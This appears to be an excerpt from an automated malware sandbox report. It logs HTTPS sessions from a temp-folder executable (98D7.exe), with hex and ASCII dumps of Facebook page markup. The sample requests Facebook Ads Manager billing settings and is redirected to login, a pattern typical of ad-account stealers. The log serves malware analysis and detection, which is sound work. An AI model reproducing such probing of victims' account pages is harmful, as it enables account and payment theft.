                                                                                    2023-02-07 18:46:04 UTC1101INData Raw: 32 4b 34 72 63 61 42 38 4e 72 65 36 6a 55 58 72 76 78 35 56 6e 39 53 31 4a 76 41 32 75 39 2d 7a 79 78 32 58 43 41 71 63 2d 62 79 5a 6e 43 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39
                                                                                    Data Ascii: 2K4rcaB8Nre6jUXrvx5Vn9S1JvA2u9-zyx2XCAqc-byZnCw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9
                                                                                    2023-02-07 18:46:04 UTC1102INData Raw: 31 30 63 30 37 39 5f 30 5f 61 5f 6c 58 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 73 74 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 6e 4f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 4a 76 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 7a 38 22 2c 7b 22
                                                                                    Data Ascii: 10c079_0_a_lX",{"__html":"Nederlands"},1],["__markup_3310c079_0_b_st",{"__html":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_nO",{"__html":"Polski"},1],["__markup_3310c079_0_d_Jv",{"__html":"Portugu\u00eas (Brasil)"},1],["__markup_3310c079_0_e_z8",{"
                                                                                    2023-02-07 18:46:04 UTC1103INData Raw: 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 38 49 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 31 65 64 64 34 39 38 30 5f 30 5f 30 5f 2b 44 22 2c 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 34 47 22 2c 22 75 5f 30 5f 31 5f 67 62 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 71 4b 22 2c 22 75 5f 30 5f 32 5f 62 42 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 7a 45 22 2c 22 75 5f 30 5f 34 5f 65 77 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 4b 75 22 2c 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72
                                                                                    Data Ascii: ments":[["__elem_835c633a_0_0_8I","login_form",1],["__elem_1edd4980_0_0_+D","loginbutton",1],["__elem_f46f4946_0_0_4G","u_0_1_gb",1],["__elem_f46f4946_0_1_qK","u_0_2_bB",1],["__elem_a588f507_0_1_zE","u_0_4_ew",1],["__elem_9f5fac15_0_0_Ku","pagelet_bluebar
                                                                                    2023-02-07 18:46:04 UTC1105INData Raw: 37 5f 30 5f 30 5f 70 4a 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 48 61 6e 64 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 32 6e 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 32
                                                                                    Data Ascii: 7_0_0_pJ"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelectorHandler","init",["__elem_ec77afbd_0_0_2n","__inst_02182015_0_0_2
                                                                                    2023-02-07 18:46:04 UTC1106INData Raw: 5f 30 5f 39 47 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 31 54 22 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 65 48 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 65 48 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 47 36 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 47 36 22 7d 2c 22 5f 39 6e 67 62 22 2c 22
                                                                                    Data Ascii: _0_9G"],["__inst_1de146dc_0_0_1T"],["CookieAccordion","init",["__elem_a588f507_0_3_eH"],[{"__m":"__elem_a588f507_0_3_eH"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_4_G6"],[{"__m":"__elem_a588f507_0_4_G6"},"_9ngb","
                                                                                    2023-02-07 18:46:04 UTC1108INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 78 42 50 71 35 75 45 68 6c 65 63 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20
                                                                                    Data Ascii: ref="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/xBPq5uEhlec.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload"
                                                                                    2023-02-07 18:46:04 UTC1109INData Raw: 63 2e 70 68 70 2f 76 33 2f 79 39 2f 6c 2f 30 2c 63 72 6f 73 73 2f 4f 4d 5f 77 32 65 72 66 35 53 70 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 61 2f 6c 2f 30 2c 63 72 6f 73 73 2f 36 6e 30 41 66 6e 4b 53 51 4f 62 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 69 67
                                                                                    Data Ascii: c.php/v3/y9/l/0,cross/OM_w2erf5Sp.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/6n0AfnKSQOb.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><script>window.__bigPipeCtor=now_inl();requireLazy(["Big
                                                                                    2023-02-07 18:46:04 UTC1111INData Raw: 32 62 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 61 67 4d 39 57 4d 77 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 61 67 4d 39 57 4d 77 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 72 72
                                                                                    Data Ascii: 2b<script nonce="BagM9WMw">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="BagM9WMw">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArr
                                                                                    2023-02-07 18:46:04 UTC1112INData Raw: 38 31 66 5f 65 43 42 46 71 44 79 38 4d 58 69 48 54 49 78 32 67 32 39 32 63 6c 56 57 34 33 36 51 59 36 51 79 35 66 67 68 45 68 74 30 4e 35 64 33 38 32 5f 56 77 77 6b 2d 49 41 7a 53 48 35 67 33 64 78 38 79 39 30 30 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 64 4a 59 55 66 5a 50 48 71 71 54 70 50 4b 4b 55 38 31 66 5f 65 43 42 46 71 44 79 38 4d 58 69 48 54 49 78 32 67 32 39 32 63 6c 56 57 34 33 36 51 59 36 51 79 35 66 67 68 45 68 74 30 4e 35 64 33 38 32 5f 56 77 77 6b 2d 49 41 7a 53 48 35 67 33 64 78 38 79 39 30 30 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b 5f 5f
                                                                                    Data Ascii: 81f_eCBFqDy8MXiHTIx2g292clVW436QY6Qy5fghEht0N5d382_Vwwk-IAzSH5g3dx8y900Y"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2dJYUfZPHqqTpPKKU81f_eCBFqDy8MXiHTIx2g292clVW436QY6Qy5fghEht0N5d382_Vwwk-IAzSH5g3dx8y900Y"]},-1],["cr:1083117",[],{__
                                                                                    2023-02-07 18:46:04 UTC1114INData Raw: 69 71 48 7a 61 50 4a 5a 50 39 41 52 32 4b 4e 4d 6c 66 64 54 6f 5f 67 6d 76 2d 54 76 5a 71 56 36 2d 50 48 2d 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65
                                                                                    Data Ascii: iqHzaPJZP9AR2KNMlfdTo_gmv-TvZqV6-PH-A"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_eve
                                                                                    2023-02-07 18:46:04 UTC1115INData Raw: 30 47 6c 54 2d 54 41 49 75 6b 75 69 71 48 7a 61 50 4a 5a 50 39 41 52 32 4b 4e 4d 6c 66 64 54 6f 5f 67 6d 76 2d 54 76 5a 71 56 36 2d 50 48 2d 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 51 35 64 38 4c 71 5f 42 33 4c 5a 2d 63 62 55 76 2d 63 6b 6c 41 70 63 6a 4a 69 36 62 76 72 41 30 47 6c 54 2d 54 41 49 75 6b 75 69 71 48 7a 61 50 4a 5a 50 39 41 52 32 4b 4e 4d 6c 66 64 54 6f 5f 67 6d 76 2d 54 76 5a 71 56 36 2d 50 48 2d 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 33 56 5a 4f 55 72 39 4f 4d
                                                                                    Data Ascii: 0GlT-TAIukuiqHzaPJZP9AR2KNMlfdTo_gmv-TvZqV6-PH-A"]},-1],["cr:983844",[],{__rc:[null,"Aa2Q5d8Lq_B3LZ-cbUv-cklApcjJi6bvrA0GlT-TAIukuiqHzaPJZP9AR2KNMlfdTo_gmv-TvZqV6-PH-A"]},-1],["cr:5278",["ReactDOM-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa3VZOUr9OM
                                                                                    2023-02-07 18:46:04 UTC1117INData Raw: 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 2f 6c 6f 67 69 6e 2e 70 68 70 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 2c 73 65 72 76 65 72 4c 49 44 3a 22 37 31 39 37 34 38 37 31
                                                                                    Data Ascii: ling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"71974871


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    13192.168.2.349740157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:12 UTC1118OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:12 UTC1119INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: 6Un7RgjSsEKfoGe1rYjZu/Qe+CsPE+FyM3q8XEM3Dz3C4p74TT00Y20LcXvC2x3VT1lpe1/CsXAaJO4inbnMww==
                                                                                    Date: Tue, 07 Feb 2023 18:46:12 GMT
                                                                                    2023-02-07 18:46:12 UTC1121INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Alt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    14192.168.2.349741157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:13 UTC1121OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:13 UTC1122INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: rvi5HRd2vVrrQSmw/D7ryj2PJEK5+hznXVTrAKR2j78HLmmv6gLm7+d/9shValp5hXR9GC1mu6g78bRBcnFLCg==
                                                                                    2023-02-07 18:46:13 UTC1124INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 31 33 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:13 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:13 UTC1124INData Raw: 64 34 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 66 35 6a 46 52 35 43 4d 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
